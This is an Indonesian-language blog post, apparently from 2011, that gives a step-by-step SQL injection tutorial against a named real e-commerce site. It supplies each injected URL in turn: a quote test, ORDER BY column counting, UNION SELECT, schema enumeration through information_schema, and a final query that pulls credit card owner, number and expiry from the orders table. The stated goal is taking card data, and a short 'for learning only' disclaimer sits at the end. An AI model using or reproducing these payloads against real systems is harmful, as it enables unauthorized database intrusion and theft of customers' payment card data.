Minimize Maximize Close

Sabtu, 16 April 2011

Hacking with SQL Injection

06.17 si OTAK MATI No comments



Setelah sekian lama ga pernah nulis di blog..akhirnya ada temen yg minta dibikinin tutorial tentang sql Injection… :devil_tb: ,Cuma butuh sedikit logika + kreatifitas..Tapi ga pa², berhubung temen seperjuangan menuntut ilmu di negeri nyamuk…sapa tau ntar kalo dah gw bikinin dia mau bantu kesulitan yang saia alami…H!H!H!H!H!
Huyee…siapkan sebungkus starmild + kopi susu :smoke_tb: :drunk_tb:
langsung sajoo, misal pada site http://www.scootsusa.com/, kita cari link yang ada bugnya…
kita dapet :
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3
Tinggal tambahin tanda petik satu (’) sajoo untuk test Vulnerbilitiesnya :laugh_tb:
alhasil muncul keterangan error seperti berikut :
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
select * FROM customer_testimonials WHERE testimonials_id = 3\'
Sekarang kita kasi perintah order by…buat nyari ada berapa kolom di sana…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 order by 20--
artinya kita coba cek langsung di binary 20, sekarang kita kurangin sampe muncul yang true…
ok..kita dapet yang true di binary 8
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 order by 8--
sedangkan yang ke 9 uda false, jadi kita dapet binarynya di angka 8.Selanjutnya kita bajak pake union select.


http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,3,4,5,6,7,8--
hasilnya :
Testimonial by 4
3
6
Langsung saja misal kita ambil angka 3 atau 6 juga bisa. :thumbup_tb:
kita cek versi sqlnya doeloe…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,version(),4,5,6,7,8--
hasilnya :
Testimonial by 4
5.0.67.d7-ourdelta-log
6
ternyata sqlnya versi 5… lanjut bajak si kacrut… :thumbup_tb:
kemudian cari table dan coloumnya…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,table_name,4,5,6,7,8 from information_schema.tables where table_schema=database()--
nah lhoo kluar semua tuh nama tablenya…xixiixixixixi :jittery_tb:
Berhubung sekarang kita mau cari data CC , kita ambil table yg nyimpen data² CC
Biasanya CC ada di table orders.Karna kita dah nemu table orders,kita coba pake table orders. Table lainnya silahkan oprek sndiri yah… :thumbup_tb:
sekarang kita cari coloumnya… :guns_tb:
sebelumnya kita konvert dolo table orders jadi hexa, jadinya 6F7264657273
sebelumnya kita tambahin karakter 0x pada hasil convert tadi kemudian masukkan ke urlnya…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,column_name,4,5,6,7,8 from information_schema.columns where table_name=0x6F7264657273--
Alhasil keluar tuh coloum²nya…hohoho
payment_method,cc_type,cc_owner,cc_number,cc_expires, dll
ok skarang kita masukkan data² tadi dan haslinya… :shock_tb:
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union select 1,2,concat_ws(0x3a,payment_method,cc_type,cc_owner,cc_number,cc_expires),4,5,6,7,8 from orders--
dan…eng..ing..eng…xixixixiixixixi :clap_tb:
semoga aja itu bisa sedikit membantu temen² yg pengen belajar SQL injection.…hanya untuk pemblajaran saja bila ada hal" yang diluar skenario Admin tidak bertanggung jawab.. :flush_tb:


By@Si OTAK MATI

Posted in:

0 komentar:

Posting Komentar

Thankz For Your Koment

RSS FeedSubscribe
Follow Us on Twitter!Follow Us

 
Design by Free NATTA Themes | Powerted by NATTA - Premium WordPress Themes | SiotakMati Corpuration